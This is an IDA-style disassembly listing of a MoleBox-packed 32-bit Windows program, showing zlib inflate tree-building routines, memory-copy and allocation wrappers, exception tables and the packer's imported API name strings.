js loc_4208F7
add edi, ebx
mov [ebp+var_B0], edx
mov [ecx], edi
xor ecx, ecx
dec eax
jz short loc_42080B
xor edi, edi
loc_4207FA: ; CODE XREF: sub_420700+109�j
add ecx, [ebp+edi+var_70]
add edi, 4
dec eax
mov [ebp+edi+var_B0], ecx
jnz short loc_4207FA
loc_42080B: ; CODE XREF: sub_420700+F6�j
mov ebx, [ebp+arg_0]
xor edi, edi
loc_420810: ; CODE XREF: sub_420700+136�j
mov eax, [ebx]
add ebx, 4
cmp eax, edx
jz short loc_420832
mov ecx, [ebp+eax*4+var_B4]
mov edx, [ebp+arg_24]
lea eax, [ebp+eax*4+var_B4]
mov [edx+ecx*4], edi
inc ecx
mov [eax], ecx
xor edx, edx
loc_420832: ; CODE XREF: sub_420700+117�j
inc edi
cmp edi, [ebp+arg_4]
jb short loc_420810
mov eax, [ebp+esi+var_B4]
mov ebx, [ebp+arg_18]
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+arg_4], eax
mov eax, [ebp+arg_24]
mov [ebp+var_C], edx
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
neg ebx
cmp eax, [ebp+var_18]
mov [ebp+var_B4], edx
mov [ebp+var_F0], edx
mov [ebp+var_1C], edx
mov [ebp+arg_0], edx
jg loc_420A6C
mov edi, [ebp+var_24]
lea ecx, [eax-1]
lea eax, [ebp+eax*4+var_74]
mov [ebp+var_2C], ecx
mov [ebp+var_20], eax
loc_420882: ; CODE XREF: sub_420700+366�j
mov eax, [ebp+var_20]
mov eax, [eax]
mov ecx, eax
dec eax
test ecx, ecx
mov [ebp+var_14], eax
jz loc_420A56
loc_420895: ; CODE XREF: sub_420700+350�j
mov eax, [ebp+arg_18]
add eax, ebx
cmp [ebp+var_4], eax
jle loc_420981
loc_4208A3: ; CODE XREF: sub_420700+279�j
mov ecx, [ebp+arg_18]
inc [ebp+var_8]
add eax, ecx
add ebx, ecx
mov [ebp+var_34], eax
mov eax, [ebp+var_18]
sub eax, ebx
cmp eax, ecx
mov [ebp+arg_0], eax
jbe short loc_4208BF
mov [ebp+arg_0], ecx
loc_4208BF: ; CODE XREF: sub_420700+1BA�j
mov ecx, [ebp+var_4]
mov edx, [ebp+var_14]
push 1
sub ecx, ebx
pop eax
shl eax, cl
inc edx
cmp eax, edx
jbe short loc_4208FE
mov esi, [ebp+var_20]
or edx, 0FFFFFFFFh
sub edx, [ebp+var_14]
add eax, edx
cmp ecx, [ebp+arg_0]
jnb short loc_4208FE
loc_4208E1: ; CODE XREF: sub_420700+1F5�j
inc ecx
cmp ecx, [ebp+arg_0]
jnb short loc_4208FE
mov edx, [esi+4]
add esi, 4
shl eax, 1
cmp eax, edx
jbe short loc_4208FE
sub eax, edx
jmp short loc_4208E1
; ---------------------------------------------------------------------------
loc_4208F7: ; CODE XREF: sub_420700+C1�j
; sub_420700+E3�j ...
push 0FFFFFFFDh
jmp loc_420A81
; ---------------------------------------------------------------------------
loc_4208FE: ; CODE XREF: sub_420700+1CF�j
; sub_420700+1DF�j ...
mov eax, [ebp+arg_20]
push 1
pop edx
mov eax, [eax]
shl edx, cl
mov [ebp+arg_0], edx
lea esi, [eax+edx]
cmp esi, 5A0h
ja short loc_4208F7
mov edx, [ebp+arg_1C]
lea eax, [edx+eax*8]
mov edx, [ebp+var_8]
mov [ebp+var_1C], eax
lea edx, [ebp+edx*4+var_F0]
mov [edx], eax
mov eax, [ebp+arg_20]
mov [eax], esi
mov eax, [ebp+var_8]
test eax, eax
jz short loc_42096B
mov esi, [ebp+var_C]
mov edi, [ebp+var_1C]
mov [ebp+eax*4+var_B4], esi
mov eax, [ebp+arg_18]
mov byte ptr [ebp+var_28], cl
mov ecx, ebx
mov byte ptr [ebp+var_28+1], al
sub ecx, eax
mov eax, esi
shr eax, cl
mov ecx, [edx-4]
mov edx, [ebp+var_28]
sub edi, ecx
sar edi, 3
sub edi, eax
mov [ecx+eax*8], edx
mov [ecx+eax*8+4], edi
jmp short loc_420973
; ---------------------------------------------------------------------------
loc_42096B: ; CODE XREF: sub_420700+235�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_420973: ; CODE XREF: sub_420700+269�j
mov eax, [ebp+var_34]
cmp [ebp+var_4], eax
jg loc_4208A3
xor edx, edx
loc_420981: ; CODE XREF: sub_420700+19D�j
mov al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_4]
sub al, bl
mov byte ptr [ebp+var_28+1], al
mov eax, [ebp+arg_24]
lea ecx, [eax+ecx*4]
mov eax, [ebp+var_10]
cmp eax, ecx
jb short loc_42099F
mov byte ptr [ebp+var_28], 0C0h
jmp short loc_4209D6
; ---------------------------------------------------------------------------
loc_42099F: ; CODE XREF: sub_420700+297�j
mov eax, [eax]
cmp eax, [ebp+arg_8]
jnb short loc_4209BA
cmp eax, 100h
mov edi, eax
sbb cl, cl
and cl, 0A0h
add cl, 60h
mov byte ptr [ebp+var_28], cl
jmp short loc_4209D2
; ---------------------------------------------------------------------------
loc_4209BA: ; CODE XREF: sub_420700+2A4�j
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_10]
shl eax, 2
mov cl, [eax+ecx]
add cl, 50h
mov byte ptr [ebp+var_28], cl
mov ecx, [ebp+arg_C]
mov edi, [eax+ecx]
loc_4209D2: ; CODE XREF: sub_420700+2B8�j
add [ebp+var_10], 4
loc_4209D6: ; CODE XREF: sub_420700+29D�j
mov ecx, [ebp+var_4]
mov eax, [ebp+var_C]
push 1
sub ecx, ebx
pop esi
shl esi, cl
mov ecx, ebx
shr eax, cl
cmp eax, [ebp+arg_0]
jnb short loc_420A0A
mov ecx, [ebp+var_1C]
lea ecx, [ecx+eax*8]
loc_4209F2: ; CODE XREF: sub_420700+306�j
mov edx, [ebp+var_28]
add eax, esi
mov [ecx], edx
mov edx, esi
shl edx, 3
mov [ecx+4], edi
add ecx, edx
cmp eax, [ebp+arg_0]
jb short loc_4209F2
xor edx, edx
loc_420A0A: ; CODE XREF: sub_420700+2EA�j
mov ecx, [ebp+var_2C]
push 1
pop eax
shl eax, cl
mov ecx, [ebp+var_C]
loc_420A15: ; CODE XREF: sub_420700+31D�j
test eax, ecx
jz short loc_420A1F
xor ecx, eax
shr eax, 1
jmp short loc_420A15
; ---------------------------------------------------------------------------
loc_420A1F: ; CODE XREF: sub_420700+317�j
xor ecx, eax
mov eax, [ebp+var_8]
mov [ebp+var_C], ecx
lea eax, [ebp+eax*4+var_B4]
loc_420A2E: ; CODE XREF: sub_420700+346�j
push 1
mov ecx, ebx
pop esi
shl esi, cl
dec esi
and esi, [ebp+var_C]
cmp esi, [eax]
jz short loc_420A48
dec [ebp+var_8]
sub eax, 4
sub ebx, [ebp+arg_18]
jmp short loc_420A2E
; ---------------------------------------------------------------------------
loc_420A48: ; CODE XREF: sub_420700+33B�j
mov eax, [ebp+var_14]
dec [ebp+var_14]
test eax, eax
jnz loc_420895
loc_420A56: ; CODE XREF: sub_420700+18F�j
inc [ebp+var_4]
add [ebp+var_20], 4
mov eax, [ebp+var_4]
inc [ebp+var_2C]
cmp eax, [ebp+var_18]
jle loc_420882
loc_420A6C: ; CODE XREF: sub_420700+16C�j
cmp [ebp+var_30], edx
jz loc_420765
cmp [ebp+var_18], 1
jz loc_420765
push 0FFFFFFFBh
loc_420A81: ; CODE XREF: sub_420700+1F9�j
pop eax
jmp loc_420767
sub_420700 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420A87 proc near ; CODE XREF: sub_41EF26+56C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_20]
push 4
push 120h
push dword ptr [esi+28h]
call dword ptr [esi+20h]
add esp, 0Ch
mov [ebp+arg_20], eax
test eax, eax
jnz short loc_420AB2
push 0FFFFFFFCh
pop eax
jmp loc_420B87
; ---------------------------------------------------------------------------
loc_420AB2: ; CODE XREF: sub_420A87+21�j
push ebx
push edi
push eax
lea eax, [ebp+var_4]
push eax
mov ebx, [ebp+arg_0]
push [ebp+arg_1C]
mov edi, 101h
push [ebp+arg_C]
push [ebp+arg_14]
push offset dword_421124
push offset dword_4210A8
push edi
push ebx
push [ebp+arg_8]
call sub_420700
add esp, 28h
test eax, eax
jnz short loc_420B59
mov eax, [ebp+arg_C]
cmp dword ptr [eax], 0
jz short loc_420B6C
push [ebp+arg_20]
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+arg_8]
push [ebp+arg_1C]
lea eax, [eax+ebx*4]
push [ebp+arg_10]
push [ebp+arg_18]
push offset dword_421218
push offset dword_4211A0
push 0
push [ebp+arg_4]
push eax
call sub_420700
add esp, 28h
test eax, eax
jnz short loc_420B2F
mov eax, [ebp+arg_10]
cmp dword ptr [eax], 0
jnz short loc_420B2B
cmp ebx, edi
ja short loc_420B50
loc_420B2B: ; CODE XREF: sub_420A87+9E�j
xor edi, edi
jmp short loc_420B78
; ---------------------------------------------------------------------------
loc_420B2F: ; CODE XREF: sub_420A87+96�j
cmp eax, 0FFFFFFFDh
jnz short loc_420B3D
mov dword ptr [esi+18h], offset aOversubscrib_0 ; "oversubscribed distance tree"
jmp short loc_420B76
; ---------------------------------------------------------------------------
loc_420B3D: ; CODE XREF: sub_420A87+AB�j
cmp eax, 0FFFFFFFBh
jnz short loc_420B4B
mov dword ptr [esi+18h], offset aIncompleteDist ; "incomplete distance tree"
jmp short loc_420B73
; ---------------------------------------------------------------------------
loc_420B4B: ; CODE XREF: sub_420A87+B9�j
cmp eax, 0FFFFFFFCh
jz short loc_420B76
loc_420B50: ; CODE XREF: sub_420A87+A2�j
mov dword ptr [esi+18h], offset aEmptyDistanceT ; "empty distance tree with lengths"
jmp short loc_420B73
; ---------------------------------------------------------------------------
loc_420B59: ; CODE XREF: sub_420A87+5C�j
cmp eax, 0FFFFFFFDh
jnz short loc_420B67
mov dword ptr [esi+18h], offset aOversubscrib_1 ; "oversubscribed literal/length tree"
jmp short loc_420B76
; ---------------------------------------------------------------------------
loc_420B67: ; CODE XREF: sub_420A87+D5�j
cmp eax, 0FFFFFFFCh
jz short loc_420B76
loc_420B6C: ; CODE XREF: sub_420A87+64�j
mov dword ptr [esi+18h], offset aIncompleteLite ; "incomplete literal/length tree"
loc_420B73: ; CODE XREF: sub_420A87+C2�j
; sub_420A87+D0�j
push 0FFFFFFFDh
pop eax
loc_420B76: ; CODE XREF: sub_420A87+B4�j
; sub_420A87+C7�j ...
mov edi, eax
loc_420B78: ; CODE XREF: sub_420A87+A6�j
push [ebp+arg_20]
push dword ptr [esi+28h]
call dword ptr [esi+24h]
pop ecx
mov eax, edi
pop ecx
pop edi
pop ebx
loc_420B87: ; CODE XREF: sub_420A87+26�j
pop esi
leave
retn
sub_420A87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420B8A proc near ; CODE XREF: sub_41EF26+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, ds:dword_422120
mov [eax], ecx
mov eax, [ebp+arg_4]
mov ecx, ds:dword_422124
mov [eax], ecx
mov eax, [ebp+arg_8]
mov dword ptr [eax], offset dword_422128
mov eax, [ebp+arg_C]
mov dword ptr [eax], offset dword_423128
xor eax, eax
pop ebp
retn
sub_420B8A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420BB9 proc near ; CODE XREF: sub_41EF26+1F0�p
; sub_41EF26+846�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, [ebp+arg_4]
mov edx, [ebx+30h]
push edi
mov edi, [ebx+34h]
mov eax, [esi+0Ch]
cmp edx, edi
mov [ebp+var_8], eax
mov [ebp+arg_0], edx
jbe short loc_420BDD
mov edi, [ebx+2Ch]
loc_420BDD: ; CODE XREF: sub_420BB9+1F�j
mov eax, [esi+10h]
sub edi, edx
cmp edi, eax
mov [ebp+var_4], edi
jbe short loc_420BEE
mov [ebp+var_4], eax
mov edi, eax
loc_420BEE: ; CODE XREF: sub_420BB9+2E�j
test edi, edi
jz short loc_420BFC
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_420BFC
and [ebp+arg_8], 0
loc_420BFC: ; CODE XREF: sub_420BB9+37�j
; sub_420BB9+3D�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_420C1E
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_420C1E: ; CODE XREF: sub_420BB9+50�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
add [ebp+arg_0], eax
and ecx, 3
rep movsb
mov eax, [ebx+2Ch]
cmp [ebp+arg_0], eax
jnz short loc_420CB7
mov edx, [ebx+28h]
cmp [ebx+34h], eax
mov [ebp+arg_0], edx
jnz short loc_420C52
mov [ebx+34h], edx
loc_420C52: ; CODE XREF: sub_420BB9+94�j
mov esi, [ebp+arg_4]
mov edi, [ebx+34h]
sub edi, edx
mov eax, [esi+10h]
mov [ebp+var_4], edi
cmp edi, eax
jbe short loc_420C69
mov [ebp+var_4], eax
mov edi, eax
loc_420C69: ; CODE XREF: sub_420BB9+A9�j
test edi, edi
jz short loc_420C77
cmp [ebp+arg_8], 0FFFFFFFBh
jnz short loc_420C77
and [ebp+arg_8], 0
loc_420C77: ; CODE XREF: sub_420BB9+B2�j
; sub_420BB9+B8�j
add [esi+14h], edi
sub eax, edi
mov [esi+10h], eax
mov eax, [ebx+38h]
test eax, eax
jz short loc_420C99
push edi
push edx
push dword ptr [ebx+3Ch]
call eax
mov edx, [ebp+arg_0]
mov [ebx+3Ch], eax
add esp, 0Ch
mov [esi+30h], eax
loc_420C99: ; CODE XREF: sub_420BB9+CB�j
mov ecx, edi
mov edi, [ebp+var_8]
mov eax, ecx
mov esi, edx
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, [ebp+var_4]
add [ebp+var_8], eax
and ecx, 3
add [ebp+arg_0], eax
rep movsb
loc_420CB7: ; CODE XREF: sub_420BB9+89�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
pop edi
pop esi
mov [eax+0Ch], ecx
mov eax, [ebp+arg_0]
mov [ebx+30h], eax
mov eax, [ebp+arg_8]
pop ebx
leave
retn
sub_420BB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420CCE proc near ; CODE XREF: sub_414C5A+32C�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
mov eax, [ebp+arg_8]
push esi
mov esi, [ebp+arg_4]
mov [ebp+var_38], eax
mov eax, [ebp+arg_C]
and [ebp+var_18], 0
mov [ebp+var_34], eax
mov eax, [ebp+arg_0]
and [ebp+var_14], 0
mov [ebp+var_2C], eax
mov eax, [esi]
push edi
mov [ebp+var_28], eax
push 38h
lea eax, [ebp+var_38]
push offset byte_4220A8
push eax
call sub_420306
add esp, 0Ch
test eax, eax
jnz short loc_420D49
lea eax, [ebp+var_38]
push 4
push eax
call sub_42031E
mov edi, eax
pop ecx
cmp edi, 1
pop ecx
jz short loc_420D3A
lea eax, [ebp+var_38]
push eax
call sub_4201DB
test edi, edi
pop ecx
jnz short loc_420D36
push 0FFFFFFFBh
pop eax
jmp short loc_420D49
; ---------------------------------------------------------------------------
loc_420D36: ; CODE XREF: sub_420CCE+61�j
mov eax, edi
jmp short loc_420D49
; ---------------------------------------------------------------------------
loc_420D3A: ; CODE XREF: sub_420CCE+53�j
mov eax, [ebp+var_24]
mov [esi], eax
lea eax, [ebp+var_38]
push eax
call sub_4201DB
pop ecx
loc_420D49: ; CODE XREF: sub_420CCE+3F�j
; sub_420CCE+66�j ...
pop edi
pop esi
leave
retn
sub_420CCE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D4D proc near ; DATA XREF: sub_42021C+41�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
imul eax, [ebp+arg_8]
push eax
call sub_41BA4A
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_420D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D67 proc near ; DATA XREF: sub_42021C+50�o
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
call sub_41BACD
pop ecx
leave
retn
sub_420D67 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420D80 proc near ; CODE XREF: sub_411BAD+5�j
; _3:00411BB7�j
push ebp
mov ebp, esp
push offset aApiNopefunc ; ":API:NopeFunc"
call sub_41BBE7
pop ebp
retn
sub_420D80 endp ; sp-analysis failed
_3 ends
; Section 5. (virtual address 00021000)
; Virtual size : 00000CC4 ( 3268.)
; Section size in file : 00000CC4 ( 3268.)
; Offset to raw data for section: 00021000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_4 segment para public 'CODE' use32
assume cs:_4
;org 421000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
dword_421000 dd 77E79908h ; DATA XREF: sub_411310+3AD�r
; sub_411DF0+46�r ...
dword_421004 dd 77E7A5FDh ; DATA XREF: sub_411310+1D9�r
; sub_411310+1ED�r ...
dword_421008 dd 77E79A45h ; DATA XREF: sub_411310+1A5�r
; sub_411310+398�r ...
dword_42100C dd 77E6D706h ; DATA XREF: sub_411310+12B�r
; sub_411310+173�r ...
dword_421010 dd 77E79881h ; DATA XREF: sub_411310+1A�r
; sub_411310+108�r ...
dword_421014 dd 77E79F93h ; DATA XREF: sub_411310+A�r
; sub_411310+1B0�r ...
dword_421018 dd 77F7E300h ; DATA XREF: sub_410060+4�r
; sub_41314B+15�r ...
dword_42101C dd 77F7E21Fh ; DATA XREF: sub_410000+2C�r
; sub_413056+65�r ...
dword_421020 dd 77E6E154h ; DATA XREF: sub_41A8B3+114�r
dword_421024 dd 77E61A90h ; DATA XREF: sub_41AB84+3A�r
; sub_41AB84+7C�r ...
dword_421028 dd 77E62050h ; DATA XREF: _3:0041E109�r
dword_42102C dd 77E641EBh ; DATA XREF: sub_410D4F+59�r
; sub_410D4F+8D�r
dword_421030 dd 77E781F9h ; DATA XREF: sub_410A10+42�r
; sub_410A10+14D�r ...
dword_421034 dd 77F6183Eh ; DATA XREF: sub_410F00�r
dword_421038 dd 77E79924h ; DATA XREF: sub_410A10+20D�r
dword_42103C dd 77E77CCEh ; DATA XREF: sub_410A10+DF�r
; sub_410A10+137�r ...
dword_421040 dd 77E77405h ; DATA XREF: sub_410A10+5E�r
; sub_410A10+A7�r
dword_421044 dd 77E7C866h ; DATA XREF: sub_410D4F+3F�r
; sub_410D4F+12D�r
dd 0
dword_42104C dd 77D46F5Bh ; DATA XREF: sub_41015E+AD�r
dd 2 dup(0)
dword_421058 dd 10h ; DATA XREF: sub_41EF26+36F�r
; sub_41EF26+3A0�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh, 0FFFF0000h
dword_4210A8 dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_420A87+48�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_421124 dd 8 dup(0) ; DATA XREF: sub_420A87+43�o
dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_4211A0 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_420A87+81�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_421218 dd 4 dup(0) ; DATA XREF: sub_420A87+7C�o
dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_421290 dd 0FFFFFFFFh, 0 ; DATA XREF: _3:00412BD5�o
dd offset dword_412D44+0C0h
align 10h
dd offset dword_412D44+90h
dd offset dword_412D44+96h
dword_4212A8 dd 0FFFFFFFFh, 0 ; DATA XREF: _3:00412E55�o
dd offset sub_41302C
align 8
dword_4212B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413056+5�o
dd offset sub_41314B
align 8
dword_4212C8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413272+5�o
dd offset sub_41363F
align 8
dword_4212D8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_410000+5�o
dd offset sub_41005D
align 8
dword_4212E8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4136FE+5�o
dd offset sub_413809
align 8
dword_4212F8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413838+5�o
dd offset sub_41393D
align 8
dword_421308 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41396C+5�o
dd offset sub_413CC7
dd 2 dup(0)
dd offset sub_413AB3
dword_421320 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413D44+5�o
dd offset loc_413EBE
align 10h
dword_421330 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413EED+5�o
dd offset loc_413FB0
align 10h
dword_421340 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_413FDF+5�o
dd offset loc_4141CF
align 10h
dword_421350 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_414214+5�o
dd offset sub_414315
align 10h
dword_421360 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41441F+5�o
dd offset sub_414641
align 10h
dword_421370 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_414670+5�o
dd offset sub_414710
align 10h
dword_421380 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41473F+5�o
dd offset loc_414827
align 10h
dword_421390 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_414856+5�o
dd offset sub_41491F
align 10h
dword_4213A0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41494E+5�o
dd offset sub_4149DF
align 10h
dword_4213B0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_414C5A+5�o
dd offset sub_414E9B
align 10h
dword_4213C0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_415175+5�o
dd offset sub_41543F
align 10h
dword_4213D0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41553D+5�o
dd offset sub_415848
align 10h
dword_4213E0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_415867+5�o
dd offset sub_415924
align 10h
dword_4213F0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_415B59+5�o
dd offset sub_416029
align 10h
dword_421400 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_416C60+5�o
dd offset sub_41734E
dd 0
dd offset loc_417100
dd offset loc_417131
dword_421418 dd 0FFFFFFFFh, 0 ; DATA XREF: _3:004173B5�o
dd offset dword_417B48+4BCh
align 8
dword_421428 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_418070+5�o
dd offset sub_41827C
align 8
dword_421438 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_4182B0+5�o
dd offset sub_418371
align 8
dword_421448 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41839F+5�o
dd offset sub_41845F
align 8
dword_421458 dd 0FFFFFFFFh, 418E48h, 418E5Bh, 0 ; DATA XREF: sub_418B90+5�o
dd offset loc_418D10
dd offset loc_418D24
dword_421470 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_418F16+5�o
dd offset loc_41917B
align 10h
dword_421480 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_419393+5�o
dd offset sub_419405
align 10h
dword_421490 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_419529+5�o
dd offset nullsub_2
align 10h
dd offset loc_419731
dd offset loc_41973A
dd 0
dd offset loc_419854
dd offset loc_41985D
align 8
dword_4214B8 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_419995+5�o
dd offset sub_41A789
align 8
dd offset sub_41A28B
dd offset sub_41A294
dd 1, 0
dd offset sub_41A240
align 10h
dword_4214E0 dd 0FFFFFFFFh, 41A9D3h, 41AA0Dh ; DATA XREF: sub_41A8B3+5�o
off_4214EC dd offset aMoleboxLaunche ; DATA XREF: sub_41BAF1+13�r
; sub_41C317+252�r
; "MoleBox launcher fatal error"
off_4214F0 dd offset aAssertionFai_0 ; DATA XREF: sub_413056+B6�r
; sub_41396C+BF�r ...
; "ASSERTION failed"
off_4214F4 dd offset aStripped ; DATA XREF: sub_413056+BE�r
; sub_41396C+C7�r ...
; "<stripped>"
dword_4214F8 dd 0FFFFFFFFh, 41BB62h, 41BB66h, 0 ; DATA XREF: sub_41BB26+5�o
dword_421508 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41BC28+5�o
dd offset loc_41BDEC
align 8
dword_421518 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41BE16+5�o
dd offset sub_41BE9B
align 8
dword_421528 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41BEBA+5�o
dd offset sub_41BF54
align 8
dword_421538 dd 0FFFFFFFFh, 41C2EBh, 41C2EFh, 0 ; DATA XREF: sub_41C106+5�o
dword_421548 dd 0FFFFFFFFh, 41C6D0h, 41C6D4h, 0 ; DATA XREF: sub_41C5E3+5�o
dword_421558 dd 0FFFFFFFFh, 41C91Ch, 41C920h, 0FFFFFFFFh, 41C995h, 41C999h
; DATA XREF: sub_41C87E+5�o
dword_421570 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CBF6+5�o
dd offset loc_41CCF3
align 10h
dword_421580 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CD16+5�o
dd offset sub_41CD74
align 10h
dword_421590 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CE67+5�o
dd offset loc_41CF7B
align 10h
dword_4215A0 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_41CF9E+5�o
dd offset loc_41D080
dword_4215AC dd 6E72656Bh, 32336C65h, 6C6C642Eh, 0 ; DATA XREF: sub_41D40A+FB�o
; sub_41D40A+15F�o ...
dword_4215BC dd 33696467h, 6C642E32h, 6Ch ; DATA XREF: sub_41D40A+10F�o
; sub_41E519+5�o ...
dword_4215C8 dd 72657375h, 642E3233h, 6C6Ch ; DATA XREF: sub_41D40A+123�o
dword_4215D4 dd 33656C6Fh, 6C642E32h, 6Ch, 61766461h, 32336970h, 6C6C642Eh
; DATA XREF: sub_41CBF6+C2�o
; sub_41CE67+6E�o ...
dd 0
dword_4215F0 dd 61656C6Fh, 32337475h, 6C6C642Eh, 0 ; DATA XREF: sub_41D0A3+30�o
; sub_41D112+6F�o ...
aSetunhandled_0 db 'SetUnhandledExceptionFilter',0 ; DATA XREF: _5:00424224�o
aCreatefilea_0 db 'CreateFileA',0 ; DATA XREF: _5:0042422C�o
aCreatefilew_0 db 'CreateFileW',0 ; DATA XREF: _5:00424234�o
aReadfile_0 db 'ReadFile',0 ; DATA XREF: _5:0042424C�o
align 10h
aClosehandle_0 db 'CloseHandle',0 ; DATA XREF: _5:00424254�o
aSetfilepoint_0 db 'SetFilePointer',0 ; DATA XREF: _5:0042425C�o
align 4
aGetfilesize_0 db 'GetFileSize',0 ; DATA XREF: _5:00424264�o
aExitprocess_0 db 'ExitProcess',0 ; DATA XREF: _5:0042426C�o
aCreatefilema_1 db 'CreateFileMappingA',0 ; DATA XREF: _5:00424274�o
align 4
aCreatefilema_2 db 'CreateFileMappingW',0 ; DATA XREF: _5:0042427C�o
align 4
aLoadlibrarya_0 db 'LoadLibraryA',0 ; DATA XREF: _5:0042429C�o
align 4
aLoadlibraryw db 'LoadLibraryW',0 ; DATA XREF: _5:004242A4�o
align 4
aLoadlibrarye_0 db 'LoadLibraryExA',0 ; DATA XREF: _5:004242AC�o
align 4
aLoadlibraryexw db 'LoadLibraryExW',0 ; DATA XREF: _5:004242B4�o
align 4
aFreelibrary_0 db 'FreeLibrary',0 ; DATA XREF: _5:00424294�o
aGetprocaddre_0 db 'GetProcAddress',0 ; DATA XREF: _5:004242BC�o
align 4
